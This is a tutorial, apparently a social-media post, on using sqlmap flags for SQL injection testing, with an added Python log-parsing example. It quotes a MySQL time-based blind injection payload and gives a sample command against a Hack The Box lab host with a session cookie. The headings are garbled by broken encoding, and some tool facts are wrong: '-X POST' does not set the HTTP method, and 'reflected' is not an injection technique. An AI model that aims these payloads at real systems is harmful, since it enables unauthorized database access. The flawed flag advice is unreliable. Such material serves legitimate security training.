๐—ข๐—ฝ๐˜๐—ถ๐—บ๐—ถ๐˜‡๐—ถ๐—ป๐—ด ๐—ฆ๐—ค๐—Ÿ ๐—œ๐—ป๐—ท๐—ฒ๐—ฐ๐˜๐—ถ๐—ผ๐—ป ๐˜„๐—ถ๐˜๐—ต ๐—ฆ๐—ค๐—Ÿ๐— ๐—ฎ๐—ฝ: ๐—” ๐—ฃ๐—ฟ๐—ฎ๐—ฐ๐˜๐—ถ๐—ฐ๐—ฎ๐—น ๐—š๐˜‚๐—ถ๐—ฑ๐—ฒ

A tool is only as effective as its operator. Properly utilizing flags can significantly enhance the efficiency, confidence, and success rate of injection testing.

๐—ž๐—ฒ๐˜† ๐—ฅ๐—ฒ๐—ฐ๐—ผ๐—บ๐—บ๐—ฒ๐—ป๐—ฑ๐—ฎ๐˜๐—ถ๐—ผ๐—ป๐˜€
โ€ข --๐˜ฉ๐˜ฆ๐˜ญ๐˜ฑ or --๐˜ฉ๐˜ฆ๐˜ญ๐˜ฑ | ๐˜จ๐˜ณ๐˜ฆ๐˜ฑ <๐˜ฑ๐˜ข๐˜ณ๐˜ข๐˜ฎ๐˜ฆ๐˜ต๐˜ฆ๐˜ณ> to access and filter the flag documentation, which provides an overview of all options.
โ€ข -๐˜ to include necessary headers, such as session cookies. Limit headers to those necessary for the process.
โ€ข --๐˜ธ๐˜ช๐˜ป๐˜ข๐˜ณ๐˜ฅ flag is useful for beginners, as it provides step-by-step prompts for configuring each command.
โ€ข --๐˜ฅ๐˜ถ๐˜ฎ๐˜ฑ or --๐˜ฅ๐˜ถ๐˜ฎ๐˜ฑ-๐˜ข๐˜ญ๐˜ญ should be selective; dumping the entire database is often unnecessary.
โ€ข Select only the flags that are essential for the task, and avoid redundant or unnecessary ones.

๐—•๐˜‚๐—ถ๐—น๐—ฑ๐—ถ๐—ป๐—ด ๐—ผ๐—ป ๐—Ÿ๐—ผ๐—ด๐˜€ ๐—ณ๐—ผ๐—ฟ ๐—”๐—ฐ๐—ฐ๐˜‚๐—ฟ๐—ฎ๐—ฐ๐˜†
Use previous scans logs data to increase the accuracy of subsequent attempts.
Example:

Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=lll' AND (SELECT 5284 FROM (SELECT(SLEEP(5)))AZYl) AND 'BlOZ'='BlOZ

In the following scan we should use:
• --technique to specify the type (e.g., time-based, blind, reflected).
• -p to designate specific parameters to test.
• --data or --data-raw for raw data formats.
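
The narrowing step described above, as an added example (not from the original post or the sqlmap project): it parses the injection-point stanza from a previous scan and derives the -p, --technique and --dbms arguments for a focused re-run. The function names, the DBMS-name heuristic and the sample text are assumptions made for this illustration; the technique letters are sqlmap's documented BEUSTQ codes.

```python
import re

# Constructed sample: the injection-point stanza quoted above, as sqlmap logs it.
SAMPLE_LOG = """\
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=lll' AND (SELECT 5284 FROM (SELECT(SLEEP(5)))AZYl) AND 'BlOZ'='BlOZ
"""

# sqlmap's --technique letters (BEUSTQ), keyed by the lowercased "Type:" text.
TECHNIQUE_LETTER = {
    "boolean-based blind": "B", "error-based": "E",
    "union query": "U", "stacked queries": "S",
    "time-based blind": "T", "inline query": "Q",
}
# Heuristic (assumption): DBMS-specific payload titles start with the DBMS name.
KNOWN_DBMS = ("Microsoft SQL Server", "PostgreSQL", "MySQL", "Oracle", "SQLite")


def parse_findings(log_text):
    """Return one dict per logged technique: parameter, place, type, title."""
    findings, param, place = [], None, None
    for raw in log_text.splitlines():
        line = raw.strip()
        m = re.match(r"Parameter: (.+?) \((.+)\)$", line)
        if m:
            param, place = m.groups()
        elif line.startswith("Type: ") and param:
            findings.append({"parameter": param, "place": place, "type": line[6:]})
        elif line.startswith("Title: ") and findings:
            findings[-1]["title"] = line[7:]
    return findings


def narrowing_flags(findings):
    """Build the -p / --technique / --dbms arguments for a focused re-run."""
    if not findings:
        raise ValueError("no injection point found in log")
    params = sorted({f["parameter"] for f in findings})
    # An unrecognised Type raises KeyError rather than silently widening the scan.
    letters = "".join(sorted({TECHNIQUE_LETTER[f["type"].lower()] for f in findings}))
    flags = ["-p", ",".join(params), "--technique=" + letters]
    dbms = {d for f in findings for d in KNOWN_DBMS if f.get("title", "").startswith(d)}
    if len(dbms) == 1:  # pin the DBMS only when the titles name exactly one
        flags.append("--dbms=" + dbms.pop())
    return flags
```

For the stanza above, narrowing_flags(parse_findings(SAMPLE_LOG)) returns -p username, --technique=T and --dbms=MySQL, so the re-run skips every other parameter, technique and DBMS fingerprint.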

๐—–๐—ผ๐—ป๐˜€๐˜๐—ฟ๐˜‚๐—ฐ๐˜๐—ถ๐—ป๐—ด ๐—ฎ ๐——๐—ฎ๐˜๐—ฎ๐—ฏ๐—ฎ๐˜€๐—ฒ ๐—˜๐—ป๐˜‚๐—บ๐—ฒ๐—ฟ๐—ฎ๐˜๐—ถ๐—ผ๐—ป ๐—–๐—ผ๐—บ๐—บ๐—ฎ๐—ป๐—ฑ
To enumerate the entire DB, follow these steps in sequence:

  1. --dbms to specify the DBMS type.
  2. -D to specify the DB name.
  3. --tables to retrieve tables within the specified database.
  4. Continue refining to include or exclude rows and columns as needed.

Sample Command
Below is an example of a command incorporating these elements:
sqlmap -u 'http://monitorsthree.htb/forgot_password.php' \
  -X POST \
  -H 'Cookie: PHPSESSID=24nmbcrm49p11q2agoartrh17d' \
  --data 'username=name' \
  --dbms $$$ \
  --technique $$$

Replace the placeholder ($$$) with the specific values you aim to test (e.g., MySQL, time-based).

Conclusion

By gradually defining your command, SQLMap can be tailored to deliver focused, accurate results with minimized server load. Each flag used should contribute to the clarity and efficiency of your injection testing process.

Further Reference: https://github.com/sqlmapproject/sqlmap/wiki